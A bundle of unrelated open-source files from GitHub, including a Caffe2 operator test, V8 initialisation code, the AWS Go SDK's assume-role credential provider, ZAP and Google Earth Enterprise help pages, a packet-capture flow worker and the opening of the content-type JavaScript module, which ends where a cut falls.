from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from caffe2.python import core import caffe2.python.hypothesis_test_util as hu import caffe2.python.serialized_test.serialized_test_util as serial from hypothesis import given import hypothesis.strategies as st import numpy as np import unittest class TestMean(serial.SerializedTestCase): @serial.given( k=st.integers(1, 5), n=st.integers(1, 10), m=st.integers(1, 10), in_place=st.booleans(), seed=st.integers(0, 2**32 - 1), **hu.gcs ) def test_mean(self, k, n, m, in_place, seed, gc, dc): np.random.seed(seed) input_names = [] input_vars = [] for i in range(k): X_name = 'X' + str(i) input_names.append(X_name) var = np.random.randn(n, m).astype(np.float32) input_vars.append(var) def mean_ref(*args): return [np.mean(args, axis=0)] op = core.CreateOperator( "Mean", input_names, ['Y' if not in_place else 'X0'], ) self.assertReferenceChecks( device_option=gc, op=op, inputs=input_vars, reference=mean_ref, ) self.assertGradientChecks( device_option=gc, op=op, inputs=input_vars, outputs_to_check=0, outputs_with_grads=[0], ) self.assertDeviceChecks(dc, op, input_vars, [0]) if __name__ == "__main__": unittest.main()
{ "pile_set_name": "Github" }
// Copyright 2012 the V8 project authors. All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials provided // with the distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #include "v8.h" #include "assembler.h" #include "isolate.h" #include "elements.h" #include "bootstrapper.h" #include "debug.h" #include "deoptimizer.h" #include "frames.h" #include "heap-profiler.h" #include "hydrogen.h" #include "lithium-allocator.h" #include "log.h" #include "once.h" #include "platform.h" #include "runtime-profiler.h" #include "serialize.h" #include "store-buffer.h" namespace v8 { namespace internal { V8_DECLARE_ONCE(init_once); bool V8::is_running_ = false; bool V8::has_been_set_up_ = false; bool V8::has_been_disposed_ = false; bool V8::has_fatal_error_ = false; bool V8::use_crankshaft_ = true; List<CallCompletedCallback>* V8::call_completed_callbacks_ = NULL; static LazyMutex entropy_mutex = LAZY_MUTEX_INITIALIZER; static EntropySource entropy_source; bool V8::Initialize(Deserializer* des) { FlagList::EnforceFlagImplications(); InitializeOncePerProcess(); // The current thread may not yet had entered an isolate to run. // Note the Isolate::Current() may be non-null because for various // initialization purposes an initializing thread may be assigned an isolate // but not actually enter it. if (i::Isolate::CurrentPerIsolateThreadData() == NULL) { i::Isolate::EnterDefaultIsolate(); } ASSERT(i::Isolate::CurrentPerIsolateThreadData() != NULL); ASSERT(i::Isolate::CurrentPerIsolateThreadData()->thread_id().Equals( i::ThreadId::Current())); ASSERT(i::Isolate::CurrentPerIsolateThreadData()->isolate() == i::Isolate::Current()); if (IsDead()) return false; Isolate* isolate = Isolate::Current(); if (isolate->IsInitialized()) return true; is_running_ = true; has_been_set_up_ = true; has_fatal_error_ = false; has_been_disposed_ = false; return isolate->Init(des); } void V8::SetFatalError() { is_running_ = false; has_fatal_error_ = true; } void V8::TearDown() { Isolate* isolate = Isolate::Current(); ASSERT(isolate->IsDefaultIsolate()); if (!has_been_set_up_ || has_been_disposed_) return; ElementsAccessor::TearDown(); LOperand::TearDownCaches(); RegisteredExtension::UnregisterAll(); isolate->TearDown(); delete isolate; is_running_ = false; has_been_disposed_ = true; delete call_completed_callbacks_; call_completed_callbacks_ = NULL; OS::TearDown(); } static void seed_random(uint32_t* state) { for (int i = 0; i < 2; ++i) { if (FLAG_random_seed != 0) { state[i] = FLAG_random_seed; } else if (entropy_source != NULL) { uint32_t val; ScopedLock lock(entropy_mutex.Pointer()); entropy_source(reinterpret_cast<unsigned char*>(&val), sizeof(uint32_t)); state[i] = val; } else { state[i] = random(); } } } // Random number generator using George Marsaglia's MWC algorithm. static uint32_t random_base(uint32_t* state) { // Initialize seed using the system random(). // No non-zero seed will ever become zero again. if (state[0] == 0) seed_random(state); // Mix the bits. Never replaces state[i] with 0 if it is nonzero. state[0] = 18273 * (state[0] & 0xFFFF) + (state[0] >> 16); state[1] = 36969 * (state[1] & 0xFFFF) + (state[1] >> 16); return (state[0] << 14) + (state[1] & 0x3FFFF); } void V8::SetEntropySource(EntropySource source) { entropy_source = source; } void V8::SetReturnAddressLocationResolver( ReturnAddressLocationResolver resolver) { StackFrame::SetReturnAddressLocationResolver(resolver); } // Used by JavaScript APIs uint32_t V8::Random(Context* context) { ASSERT(context->IsGlobalContext()); ByteArray* seed = context->random_seed(); return random_base(reinterpret_cast<uint32_t*>(seed->GetDataStartAddress())); } // Used internally by the JIT and memory allocator for security // purposes. So, we keep a different state to prevent informations // leaks that could be used in an exploit. uint32_t V8::RandomPrivate(Isolate* isolate) { ASSERT(isolate == Isolate::Current()); return random_base(isolate->private_random_seed()); } bool V8::IdleNotification(int hint) { // Returning true tells the caller that there is no need to call // IdleNotification again. if (!FLAG_use_idle_notification) return true; // Tell the heap that it may want to adjust. return HEAP->IdleNotification(hint); } void V8::AddCallCompletedCallback(CallCompletedCallback callback) { if (call_completed_callbacks_ == NULL) { // Lazy init. call_completed_callbacks_ = new List<CallCompletedCallback>(); } for (int i = 0; i < call_completed_callbacks_->length(); i++) { if (callback == call_completed_callbacks_->at(i)) return; } call_completed_callbacks_->Add(callback); } void V8::RemoveCallCompletedCallback(CallCompletedCallback callback) { if (call_completed_callbacks_ == NULL) return; for (int i = 0; i < call_completed_callbacks_->length(); i++) { if (callback == call_completed_callbacks_->at(i)) { call_completed_callbacks_->Remove(i); } } } void V8::FireCallCompletedCallback(Isolate* isolate) { if (call_completed_callbacks_ == NULL) return; HandleScopeImplementer* handle_scope_implementer = isolate->handle_scope_implementer(); if (!handle_scope_implementer->CallDepthIsZero()) return; // Fire callbacks. Increase call depth to prevent recursive callbacks. handle_scope_implementer->IncrementCallDepth(); for (int i = 0; i < call_completed_callbacks_->length(); i++) { call_completed_callbacks_->at(i)(); } handle_scope_implementer->DecrementCallDepth(); } // Use a union type to avoid type-aliasing optimizations in GCC. typedef union { double double_value; uint64_t uint64_t_value; } double_int_union; Object* V8::FillHeapNumberWithRandom(Object* heap_number, Context* context) { double_int_union r; uint64_t random_bits = Random(context); // Convert 32 random bits to 0.(32 random bits) in a double // by computing: // ( 1.(20 0s)(32 random bits) x 2^20 ) - (1.0 x 2^20)). static const double binary_million = 1048576.0; r.double_value = binary_million; r.uint64_t_value |= random_bits; r.double_value -= binary_million; HeapNumber::cast(heap_number)->set_value(r.double_value); return heap_number; } void V8::InitializeOncePerProcessImpl() { OS::SetUp(); use_crankshaft_ = FLAG_crankshaft; if (Serializer::enabled()) { use_crankshaft_ = false; } CPU::SetUp(); if (!CPU::SupportsCrankshaft()) { use_crankshaft_ = false; } OS::PostSetUp(); RuntimeProfiler::GlobalSetUp(); ElementsAccessor::InitializeOncePerProcess(); if (FLAG_stress_compaction) { FLAG_force_marking_deque_overflows = true; FLAG_gc_global = true; FLAG_max_new_space_size = (1 << (kPageSizeBits - 10)) * 2; } LOperand::SetUpCaches(); SetUpJSCallerSavedCodeData(); SamplerRegistry::SetUp(); ExternalReference::SetUp(); } void V8::InitializeOncePerProcess() { CallOnce(&init_once, &InitializeOncePerProcessImpl); } } } // namespace v8::internal
{ "pile_set_name": "Github" }
/* Package stscreds are credential Providers to retrieve STS AWS credentials. STS provides multiple ways to retrieve credentials which can be used when making future AWS service API operation calls. The SDK will ensure that per instance of credentials.Credentials all requests to refresh the credentials will be synchronized. But, the SDK is unable to ensure synchronous usage of the AssumeRoleProvider if the value is shared between multiple Credentials, Sessions or service clients. Assume Role To assume an IAM role using STS with the SDK you can create a new Credentials with the SDKs's stscreds package. // Initial credentials loaded from SDK's default credential chain. Such as // the environment, shared credentials (~/.aws/credentials), or EC2 Instance // Role. These credentials will be used to to make the STS Assume Role API. sess := session.Must(session.NewSession()) // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN. creds := stscreds.NewCredentials(sess, "myRoleArn") // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) Assume Role with static MFA Token To assume an IAM role with a MFA token you can either specify a MFA token code directly or provide a function to prompt the user each time the credentials need to refresh the role's credentials. Specifying the TokenCode should be used for short lived operations that will not need to be refreshed, and when you do not want to have direct control over the user provides their MFA token. With TokenCode the AssumeRoleProvider will be not be able to refresh the role's credentials. // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN using the MFA token code provided. creds := stscreds.NewCredentials(sess, "myRoleArn", func(p *stscreds.AssumeRoleProvider) { p.SerialNumber = aws.String("myTokenSerialNumber") p.TokenCode = aws.String("00000000") }) // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) Assume Role with MFA Token Provider To assume an IAM role with MFA for longer running tasks where the credentials may need to be refreshed setting the TokenProvider field of AssumeRoleProvider will allow the credential provider to prompt for new MFA token code when the role's credentials need to be refreshed. The StdinTokenProvider function is available to prompt on stdin to retrieve the MFA token code from the user. You can also implement custom prompts by satisfing the TokenProvider function signature. Using StdinTokenProvider with multiple AssumeRoleProviders, or Credentials will have undesirable results as the StdinTokenProvider will not be synchronized. A single Credentials with an AssumeRoleProvider can be shared safely. // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN. Prompting for MFA token from stdin. creds := stscreds.NewCredentials(sess, "myRoleArn", func(p *stscreds.AssumeRoleProvider) { p.SerialNumber = aws.String("myTokenSerialNumber") p.TokenProvider = stscreds.StdinTokenProvider }) // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) */ package stscreds import ( "fmt" "os" "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" "github.com/aws/aws-sdk-go/aws/client" "github.com/aws/aws-sdk-go/aws/credentials" "github.com/aws/aws-sdk-go/internal/sdkrand" "github.com/aws/aws-sdk-go/service/sts" ) // StdinTokenProvider will prompt on stderr and read from stdin for a string value. // An error is returned if reading from stdin fails. // // Use this function go read MFA tokens from stdin. The function makes no attempt // to make atomic prompts from stdin across multiple gorouties. // // Using StdinTokenProvider with multiple AssumeRoleProviders, or Credentials will // have undesirable results as the StdinTokenProvider will not be synchronized. A // single Credentials with an AssumeRoleProvider can be shared safely // // Will wait forever until something is provided on the stdin. func StdinTokenProvider() (string, error) { var v string fmt.Fprintf(os.Stderr, "Assume Role MFA token code: ") _, err := fmt.Scanln(&v) return v, err } // ProviderName provides a name of AssumeRole provider const ProviderName = "AssumeRoleProvider" // AssumeRoler represents the minimal subset of the STS client API used by this provider. type AssumeRoler interface { AssumeRole(input *sts.AssumeRoleInput) (*sts.AssumeRoleOutput, error) } // DefaultDuration is the default amount of time in minutes that the credentials // will be valid for. var DefaultDuration = time.Duration(15) * time.Minute // AssumeRoleProvider retrieves temporary credentials from the STS service, and // keeps track of their expiration time. // // This credential provider will be used by the SDKs default credential change // when shared configuration is enabled, and the shared config or shared credentials // file configure assume role. See Session docs for how to do this. // // AssumeRoleProvider does not provide any synchronization and it is not safe // to share this value across multiple Credentials, Sessions, or service clients // without also sharing the same Credentials instance. type AssumeRoleProvider struct { credentials.Expiry // STS client to make assume role request with. Client AssumeRoler // Role to be assumed. RoleARN string // Session name, if you wish to reuse the credentials elsewhere. RoleSessionName string // Expiry duration of the STS credentials. Defaults to 15 minutes if not set. Duration time.Duration // Optional ExternalID to pass along, defaults to nil if not set. ExternalID *string // The policy plain text must be 2048 bytes or shorter. However, an internal // conversion compresses it into a packed binary format with a separate limit. // The PackedPolicySize response element indicates by percentage how close to // the upper size limit the policy is, with 100% equaling the maximum allowed // size. Policy *string // The identification number of the MFA device that is associated with the user // who is making the AssumeRole call. Specify this value if the trust policy // of the role being assumed includes a condition that requires MFA authentication. // The value is either the serial number for a hardware device (such as GAHT12345678) // or an Amazon Resource Name (ARN) for a virtual device (such as arn:aws:iam::123456789012:mfa/user). SerialNumber *string // The value provided by the MFA device, if the trust policy of the role being // assumed requires MFA (that is, if the policy includes a condition that tests // for MFA). If the role being assumed requires MFA and if the TokenCode value // is missing or expired, the AssumeRole call returns an "access denied" error. // // If SerialNumber is set and neither TokenCode nor TokenProvider are also // set an error will be returned. TokenCode *string // Async method of providing MFA token code for assuming an IAM role with MFA. // The value returned by the function will be used as the TokenCode in the Retrieve // call. See StdinTokenProvider for a provider that prompts and reads from stdin. // // This token provider will be called when ever the assumed role's // credentials need to be refreshed when SerialNumber is also set and // TokenCode is not set. // // If both TokenCode and TokenProvider is set, TokenProvider will be used and // TokenCode is ignored. TokenProvider func() (string, error) // ExpiryWindow will allow the credentials to trigger refreshing prior to // the credentials actually expiring. This is beneficial so race conditions // with expiring credentials do not cause request to fail unexpectedly // due to ExpiredTokenException exceptions. // // So a ExpiryWindow of 10s would cause calls to IsExpired() to return true // 10 seconds before the credentials are actually expired. // // If ExpiryWindow is 0 or less it will be ignored. ExpiryWindow time.Duration // MaxJitterFrac reduces the effective Duration of each credential requested // by a random percentage between 0 and MaxJitterFraction. MaxJitterFrac must // have a value between 0 and 1. Any other value may lead to expected behavior. // With a MaxJitterFrac value of 0, default) will no jitter will be used. // // For example, with a Duration of 30m and a MaxJitterFrac of 0.1, the // AssumeRole call will be made with an arbitrary Duration between 27m and // 30m. // // MaxJitterFrac should not be negative. MaxJitterFrac float64 } // NewCredentials returns a pointer to a new Credentials object wrapping the // AssumeRoleProvider. The credentials will expire every 15 minutes and the // role will be named after a nanosecond timestamp of this operation. // // Takes a Config provider to create the STS client. The ConfigProvider is // satisfied by the session.Session type. // // It is safe to share the returned Credentials with multiple Sessions and // service clients. All access to the credentials and refreshing them // will be synchronized. func NewCredentials(c client.ConfigProvider, roleARN string, options ...func(*AssumeRoleProvider)) *credentials.Credentials { p := &AssumeRoleProvider{ Client: sts.New(c), RoleARN: roleARN, Duration: DefaultDuration, } for _, option := range options { option(p) } return credentials.NewCredentials(p) } // NewCredentialsWithClient returns a pointer to a new Credentials object wrapping the // AssumeRoleProvider. The credentials will expire every 15 minutes and the // role will be named after a nanosecond timestamp of this operation. // // Takes an AssumeRoler which can be satisfied by the STS client. // // It is safe to share the returned Credentials with multiple Sessions and // service clients. All access to the credentials and refreshing them // will be synchronized. func NewCredentialsWithClient(svc AssumeRoler, roleARN string, options ...func(*AssumeRoleProvider)) *credentials.Credentials { p := &AssumeRoleProvider{ Client: svc, RoleARN: roleARN, Duration: DefaultDuration, } for _, option := range options { option(p) } return credentials.NewCredentials(p) } // Retrieve generates a new set of temporary credentials using STS. func (p *AssumeRoleProvider) Retrieve() (credentials.Value, error) { // Apply defaults where parameters are not set. if p.RoleSessionName == "" { // Try to work out a role name that will hopefully end up unique. p.RoleSessionName = fmt.Sprintf("%d", time.Now().UTC().UnixNano()) } if p.Duration == 0 { // Expire as often as AWS permits. p.Duration = DefaultDuration } jitter := time.Duration(sdkrand.SeededRand.Float64() * p.MaxJitterFrac * float64(p.Duration)) input := &sts.AssumeRoleInput{ DurationSeconds: aws.Int64(int64((p.Duration - jitter) / time.Second)), RoleArn: aws.String(p.RoleARN), RoleSessionName: aws.String(p.RoleSessionName), ExternalId: p.ExternalID, } if p.Policy != nil { input.Policy = p.Policy } if p.SerialNumber != nil { if p.TokenCode != nil { input.SerialNumber = p.SerialNumber input.TokenCode = p.TokenCode } else if p.TokenProvider != nil { input.SerialNumber = p.SerialNumber code, err := p.TokenProvider() if err != nil { return credentials.Value{ProviderName: ProviderName}, err } input.TokenCode = aws.String(code) } else { return credentials.Value{ProviderName: ProviderName}, awserr.New("AssumeRoleTokenNotAvailable", "assume role with MFA enabled, but neither TokenCode nor TokenProvider are set", nil) } } roleOutput, err := p.Client.AssumeRole(input) if err != nil { return credentials.Value{ProviderName: ProviderName}, err } // We will proactively generate new credentials before they expire. p.SetExpiration(*roleOutput.Credentials.Expiration, p.ExpiryWindow) return credentials.Value{ AccessKeyID: *roleOutput.Credentials.AccessKeyId, SecretAccessKey: *roleOutput.Credentials.SecretAccessKey, SessionToken: *roleOutput.Credentials.SessionToken, ProviderName: ProviderName, }, nil }
{ "pile_set_name": "Github" }
<a href="<%- url %>" class="AknColumn-navigationLink<% if (active) { %> AknColumn-navigationLink--active<% } %> navigation-item"><%- title %></a>
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"> <title>Spider tab</title> </head> <body> <h1>Spider tab</h1> <p> The Spider tab shows you the set of unique URIs found by the <a href="../../start/features/spider.html">Spider</a> during the scans. </p> <p> The 'New Scan' button launches the <a href="../dialogs/spider.html">Spider dialog</a> which allows you to specify exactly what should be scanned.<br> The Spider can be run on multiple Sites in parallel and the results for each scan are shown by selecting the scan via the 'Progress' pull-down. </p> <p>The toolbar shows information about a scan and allows to control it. It provides a set of buttons which allows to: <ul> <li><img align="bottom" alt="pause button" src="../../images/16/141.png"> Pause (and <img alt="resume button" src="../../images/16/131.png"> resume) the selected spider scan;</li> <li><img align="bottom" alt="stop button" src="../../images/16/142.png"> Stop the selected spider scan;</li> <li><img align="bottom" alt="clean scans button" src="../../images/fugue/broom.png"> Clean completed scans;</li> <li><img align="bottom" alt="spider options button" src="../../images/16/041.png"> Open the <a href="../../ui/dialogs/options/spider.html">Spider Options screen</a>.</li> </ul> The progress bar shows how far the selected spider scan has progressed. It is also shown the number of active spider scans and the number of URIs found for the selected scan. <p>For each URI found you can see: <ul> <li>Processed - Whether the URI was processed by the Spider or was skipped from fetching because of a rule (e.g. it was out of scope)</li> <li>Method - The HTTP method, e.g. GET or POST, through which the resource should be accessed</li> <li>URI - the resource found</li> <li>Flags - any information about the URI (e.g. if it's a seed or why was it not processed)</li> </ul> <p>For each spider message, shown under the Messages tab, you can see details of the request sent and response received. The <code>Processed</code> column, indicates whether: <ul> <li><img align="bottom" alt="successful parse" src="../../images/16/152.png">Successfully - the response was successfully received and parsed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Empty Message - the response was not parsed because it was empty</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">I/O Error - an input/output error occurred while fetching the response</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Children - the response was not parsed because the corresponding parent Sites node already has more child nodes than the maximum allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Depth - the response was not parsed because it passed the maximum depth allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Size - the response was not parsed because its size is not under the maximum allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Not Text - the response was not parsed because it's not text, for example, an image</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Spider Stopped - the response was not fetched or parsed because the spider was already stopped</li> </ul> <h2>See also</h2> <table> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../overview.html">UI Overview</a></td> <td>for an overview of the user interface</td> </tr> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../../start/features/spider.html">Spider</a></td> <td>for an overview of the Spider</td> </tr> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../../ui/dialogs/options/spider.html">Spider Options screen</a></td> <td>for an overview of the Spider Options</td> </tr> </table> </body> </html>
{ "pile_set_name": "Github" }
<!doctype html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Installing GEE Server &#8212; Google Earth Enterprise 5.3.3 documentation</title> <link rel="stylesheet" href="../../static/bizstyle.css" type="text/css" /> <link rel="stylesheet" href="../../static/pygments.css" type="text/css" /> <script type="text/javascript" id="documentation_options" data-url_root="../../" src="../../static/documentation_options.js"></script> <script type="text/javascript" src="../../static/jquery.js"></script> <script type="text/javascript" src="../../static/underscore.js"></script> <script type="text/javascript" src="../../static/doctools.js"></script> <script type="text/javascript" src="../../static/bizstyle.js"></script> <link rel="index" title="Index" href="../../genindex.html" /> <link rel="search" title="Search" href="../../search.html" /> <link rel="next" title="Uninstalling GEE Server" href="uninstallGEEServer.html" /> <link rel="prev" title="Before you install GEE Server" href="beforeYouInstallGEEServer.html" /> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <!--[if lt IE 9]> <script type="text/javascript" src="static/css3-mediaqueries.js"></script> <![endif]--> </head><body> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="uninstallGEEServer.html" title="Uninstalling GEE Server" accesskey="N">next</a> |</li> <li class="right" > <a href="beforeYouInstallGEEServer.html" title="Before you install GEE Server" accesskey="P">previous</a> |</li> <li class="nav-item nav-item-0"><a href="../../index.html">Google Earth Enterprise 5.3.3 documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a href="../installGEE.html" accesskey="U">Install Google Earth Enterprise</a> &#187;</li> </ul> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="beforeYouInstallGEEServer.html" title="previous chapter">Before you install GEE Server</a></p> <h4>Next topic</h4> <p class="topless"><a href="uninstallGEEServer.html" title="next chapter">Uninstalling GEE Server</a></p> <div id="searchbox" style="display: none" role="search"> <h3>Quick search</h3> <div class="searchformwrapper"> <form class="search" action="../../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <p><a class="reference internal" href="../../images/googlelogo_color_260x88dp8.png"><img alt="Google logo" src="../../images/googlelogo_color_260x88dp8.png" style="width: 130px; height: 44px;" /></a></p> <div class="section" id="installing-gee-server"> <h1>Installing GEE Server<a class="headerlink" href="#installing-gee-server" title="Permalink to this headline">¶</a></h1> <div class="docutils container"> <div class="content docutils container"> You can install GEE Server via the command line. For instructions, see the GEE wiki at <a class="reference external" href="https://github.com/google/earthenterprise/wiki/Install-Fusion-or-Earth-Server">https://github.com/google/earthenterprise/wiki/Install-Fusion-or-Earth-Server</a>.</div> </div> </div> </div> </div> </div> <div class="clearer"></div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="uninstallGEEServer.html" title="Uninstalling GEE Server" >next</a> |</li> <li class="right" > <a href="beforeYouInstallGEEServer.html" title="Before you install GEE Server" >previous</a> |</li> <li class="nav-item nav-item-0"><a href="../../index.html">Google Earth Enterprise 5.3.3 documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a href="../installGEE.html" >Install Google Earth Enterprise</a> &#187;</li> </ul> </div> <div class="footer" role="contentinfo"> &#169; Copyright 2019, Open GEE Contributors. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.7.5. </div> </body> </html>
{ "pile_set_name": "Github" }
/* Class = "UIBarButtonItem"; title = "Add Database"; ObjectID = "CbK-f7-To5"; Note = "Action"; */ "CbK-f7-To5.title" = "Lägg till databas"; /* Class = "UILabel"; text = "No recent databases"; ObjectID = "fXt-kp-oSe"; */ "fXt-kp-oSe.text" = "Inga nyligen använda databaser"; /* Class = "UINavigationItem"; title = "Databases"; ObjectID = "Zun-me-VzS"; */ "Zun-me-VzS.title" = "Databaser";
{ "pile_set_name": "Github" }
package cic.cs.unb.ca.jnetpcap.worker; import cic.cs.unb.ca.jnetpcap.BasicFlow; import cic.cs.unb.ca.jnetpcap.FlowGenerator; import cic.cs.unb.ca.jnetpcap.PacketReader; import org.jnetpcap.Pcap; import org.jnetpcap.nio.JMemory.Type; import org.jnetpcap.packet.PcapPacket; import org.jnetpcap.packet.PcapPacketHandler; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.swing.*; import java.util.List; public class TrafficFlowWorker extends SwingWorker<String,String> implements FlowGenListener{ public static final Logger logger = LoggerFactory.getLogger(TrafficFlowWorker.class); public static final String PROPERTY_FLOW = "flow"; private String device; public TrafficFlowWorker(String device) { super(); this.device = device; } @Override protected String doInBackground() { FlowGenerator flowGen = new FlowGenerator(true,120000000L, 5000000L); flowGen.addFlowListener(this); int snaplen = 64 * 1024;//2048; // Truncate packet at this size int promiscous = Pcap.MODE_PROMISCUOUS; int timeout = 60 * 1000; // In milliseconds StringBuilder errbuf = new StringBuilder(); Pcap pcap = Pcap.openLive(device, snaplen, promiscous, timeout, errbuf); if (pcap == null) { logger.info("open {} fail -> {}",device,errbuf.toString()); return String.format("open %s fail ->",device)+errbuf.toString(); } PcapPacketHandler<String> jpacketHandler = (packet, user) -> { /* * BufferUnderflowException while decoding header * that is because: * 1.PCAP library is not multi-threaded * 2.jNetPcap library is not multi-threaded * 3.Care must be taken how packets or the data they referenced is used in multi-threaded environment * * typical rule: * make new packet objects and perform deep copies of the data in PCAP buffers they point to * * but it seems not work */ PcapPacket permanent = new PcapPacket(Type.POINTER); packet.transferStateAndDataTo(permanent); flowGen.addPacket(PacketReader.getBasicPacketInfo(permanent, true, false)); if(isCancelled()) { pcap.breakloop(); logger.debug("break Packet loop"); } }; //FlowMgr.getInstance().setListenFlag(true); logger.info("Pcap is listening..."); firePropertyChange("progress","open successfully","listening: "+device); int ret = pcap.loop(Pcap.DISPATCH_BUFFER_FULL, jpacketHandler, device); String str; switch (ret) { case 0: str = "listening: " + device + " finished"; break; case -1: str = "listening: " + device + " error"; break; case -2: str = "stop listening: " + device; break; default: str = String.valueOf(ret); } return str; } @Override protected void process(List<String> chunks) { super.process(chunks); } @Override protected void done() { super.done(); } @Override public void onFlowGenerated(BasicFlow flow) { firePropertyChange(PROPERTY_FLOW,null,flow); } }
{ "pile_set_name": "Github" }
/*! * content-type * Copyright(c) 2015 Douglas Christopher Wilson * MIT Licensed */ 'use strict' /** * RegExp to match *( ";" parameter ) in RFC 7231 sec 3.1.1.1 * * parameter = token "=" ( token / quoted-string ) * token = 1*tchar * tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" * / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~" * / DIGIT / ALPHA * ; any VCHAR, except delimiters * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE * qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text * obs-text = %x80-FF * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) */ var paramRegExp = /; *([!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+) *= *("(?:[\u000b\u0020\u0021\u0023-\u005b\u005d-\u007e\u0080-\u00ff]|\\[\u000b\u0020-\u00ff])*"|[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+) */g var textRegExp = /^[\u000b\u0020-\u007e\u0080-\u00ff]+$/ var tokenRegExp = /^[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+$/ /** * RegExp to match quoted-pair in RFC 7230 sec 3.2.6 * * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) * obs-text = %x80-FF */ var qescRegExp = /\\([\u000b\u0020-\u00ff])/g /** * RegExp to match chars that must be quoted-pair in RFC 7230 sec 3.2.6 */ var quoteRegExp = /([\\"])/g /** * RegExp to match type in RFC 6838 * * media-type = type "/" subtype * type = token * subtype = token */ var typeRegExp = /^[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+\/[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+$/ /** * Module exports. * @public */ exports.format = format exports.parse = parse /** * Format object to media type. * * @param {object} obj * @return {string} * @public */ function format(obj) { if (!obj || typeof obj !== 'object') { throw new TypeError('argument obj is required') } var parameters = obj.parameters var type = obj.type if (!type || !typeRegExp.test(type)) { throw new TypeError('invalid type') } var string = type // append parameters if (parameters && typeof parameters === 'object') { var param var params = Object.keys(parameters).sort() for (var i = 0; i < params.length; i++) { param = params[i] if (!tokenRegExp.test(param)) { throw new TypeError('invalid parameter name') } string += '; ' + param + '=' + qstring(parameters[param]) } } return string } /** * Parse media type to object. * * @param {string|object} string * @return {Object} * @public */ function parse(string) { if (!string) { throw new TypeError('argument string is required') } if (typeof string === 'object') { // support req/res-like objects as argument string = getcontenttype(string) if (typeof string !== 'string') { throw new TypeError('content-type header is missing from object'); } } if (typeof string !== 'string') { throw new TypeError('argument string is required to be a string') } var index = string.indexOf(';') var type = index !== -1 